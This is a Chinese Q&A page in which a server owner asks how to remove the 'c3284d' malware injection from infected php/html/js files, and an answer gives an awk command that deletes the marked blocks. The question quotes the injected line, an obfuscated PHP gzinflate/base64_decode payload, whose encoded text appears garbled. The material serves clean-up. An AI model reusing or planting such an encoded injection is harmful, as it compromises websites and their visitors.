当前位置: 首页 > 面试题库 >

使用搜索和替换来清理感染了c3284d病毒的服务器

曹景铄
2023-03-14
问题内容

我遇到了臭名昭著的c3284d病毒。它几乎可以修改所有可以找到的html / php / js文件。

我已经更改了服务器上的所有密码和用户,因此,如果它是一个受感染的帐户,它应该已经解决了该问题,但是我仍在努力将其完全删除。

我可以使用一个简单的sudo grep -R "#c3284d#" /home命令找到所有受感染的文件。

但是我需要一种快速的方法来搜索和 替换 它。

病毒签名是这一行:

“#c3284d#” 回波(gzinflate(BASE64_DECODE( “VVHBboMwDL1X6j /
kZtA6GKgMdaOVummHnfYB6xQFYkokmqSJS +
nfD1hXbb7ZfvZ7fi585ZSlzXzWCcf4ka2ZNNXpgJqiyqEgfGtxzAJQtRMHhHAxn7EhuB6w4JG2RE6VJ0J4ns
/ 48ZPrrwC8q2DBoCGyT3HcoHBkamtajDRS3B /
ayDYWwmki8nQZGtZ4RcpMa0XpTXtbeQWclaRm7CaPtv9LNgkrjZPoBlItOrUXZFx08ui2 + /
EUpSX2H3UA8kHkIlmmZZ5lSZ5Kkad1nS9FIqo0S1YrCNkdS / 7parGmkfU + y1b5D /
HNorNThAEUUnVMyfUOOJdOyG4HmyIeipvpxBt8j3S18 + XyLoNfNISRsBa1fG1UKwN + HIeK +
Pqabw ==”))); “#/ c3284d#”

当回声线可以改变和变化时,但始终以开头#c32..#和结尾#/c3....#

我只想一无所有。


问题答案:
awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }' dirty-file > clean-file

那是一个大嘴巴,但是可以解决这个问题:

$ cat <<'EOF' | awk 'BEGIN { clean=1 } /#c3284d#/ { clean=0 } /#\/c3284d#/ { clean=1 } { if (clean==1 && match($0,"#\/c3284d#") == 0) { print $0 } }'
> foo
> #c3284d#
> bar
> baz
> #/c3284d#
> quux
> EOF
foo
quux


 类似资料:
  • 按下 / 键,编辑器底部会出现 / 符号,接着输入字符串,便可以进行搜索 / 向下搜索 ? 向上搜索 n 搜索下一个 N 搜索上一个 :s/源字符串/目标字符串 将源字符串替换为目标字符串 :s/源字符串/目标字符串/g 替换当前行中所有符合条件的字符串 :行号1,行号2s/源字符串/目标字符串/g 在指定行中进行替换 :%s/源字符串/目标字符串/g 全文替换

  • 问题内容: 诚然,对于SQL命令,我是一个菜鸟。黑客在我的一个WordPress网站上的每个帖子和页面的末尾插入了一个脚本标签,我试图在“ wp_posts”表中进行查找和替换,但是当我运行“模拟查询。这是我所拥有的: 无论我在第一组“查找”引号中添加了什么内容,即使是像“ hcifx”一样简单的东西,而不是所显示的整个脚本标签,我都会收到错误消息。有什么想法我要去哪里吗? 问题答案: 原来,该错

  • Sublime Text 提供两种主要搜索方式: 单文件搜索 多文件搜索 两种方式都支持正则表达式。 单文件搜索 搜索 键盘快捷键与搜索面板对应关系: 打开搜索面板 Ctrl + F 正则表达式 Alt + R 大小写匹配 Alt + C 精确匹配 Alt + W 下一个 Enter 上一个 Shift + Enter 所有 Alt + Enter 增量搜索 键盘快捷键与增量搜索面板对应关系: 打

  • 搜索和替换 其他常见的用途就是找到所有模式匹配的字符串并用不同的字符串来替换它们。sub() 方法提供一个替换值,可以是字符串或一个函数,和一个要被处理的字符串。 sub(replacement, string[, count = 0]) 返回的字符串是在字符串中用 RE 最左边不重复的匹配来替换。如果模式没有发现,字符将被没有改变地返回。 可选参数 count 是模式匹配后替换的最大次数;co

  • 我用自己写的代码做了一个apk。 当我使用华为或体内细胞下载apk时,浏览器会显示提示“应用程序感染了病毒”。 如何修复它?

  • 注意:自从 Seafile 5.0.0 版本以后,所有的配置文件转移到了统一的配置文件目录 conf 。详情 在Seafile专业版 4.4.0(及以上)版本中,Seafile可以在后台扫描上传文件中的恶意内容。配置为定期运行后,扫描程序将扫描所有现有库。此后的每次扫描中,该程序仅扫描上次扫描后新上传的或更新过的文件。对于每一个文件,该进程都执行一条用户指定的病毒扫描指令来检查文件是否是病毒。大多